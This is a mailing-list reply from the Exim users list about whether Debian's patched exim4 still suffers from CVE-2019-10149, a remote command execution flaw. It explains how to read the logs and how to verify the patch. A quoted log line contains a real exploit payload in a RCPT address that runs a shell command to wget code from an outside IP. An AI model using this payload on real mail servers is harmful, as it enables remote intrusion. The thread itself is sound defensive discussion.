Re: [exim] CVE-2019-10149: already vulnerable ?

Page principale
Supprimer ce message
Répondre à ce message
Auteur: Andreas Metzler
Date:  
À: exim-users
Sujet: Re: [exim] CVE-2019-10149: already vulnerable ?
Thomas Hager via Exim-users <exim-users@???> wrote:
[...]
>> That would have been a better line in the logs (from a fixed system):
>> 2019-06-19 04:07:40 H=(service.com) [68.183.4.19] F=<
>> support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-
>> c\t\x22wget\x20213.227.155.101\x2ftmp\x2f212.80.235.131\
>> x22}}@localhost>: relay not permitted
> None of these though, and I patched my Exim as soon as the Debian
> update was ready (On the 5th).


Hello,

the log-files on a try to exploit CVE-2019-10149 will look exactly the same
for a vulnerable and for a fixed exim.

CVE-2019-10149 is not that it is possible to submit a mail that ends
up frozen in the queue. CVE is a remote command execution
vulnerabilty. The fix for CVE-2019-10149 does not remove the
possibility to generate frozen mails in the queue, it stops the remote
command execution.

> Is Debian's exim4 version 4.89-2+deb9u4 not patched properly?


The included patch is this one:
https://sources.debian.org/src/exim4/4.89-2+deb9u4/debian/patches/83_qsa-2019-exim4.patch/

And if you go and try the local exploit described in detail on
https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html
you'll see that with exim4-daemon-light 4.89-2+deb9u3 you'll end up
with the code execution (/tmp/id is generated), while with
exim4-daemon-light 4.89-2+deb9u4 /tmp/id is NOT generated.

cu Andreas
--
`What a good friend you are to him, Dr. Maturin. His other friends are
so grateful to you.'
`I sew his ears on from time to time, sure'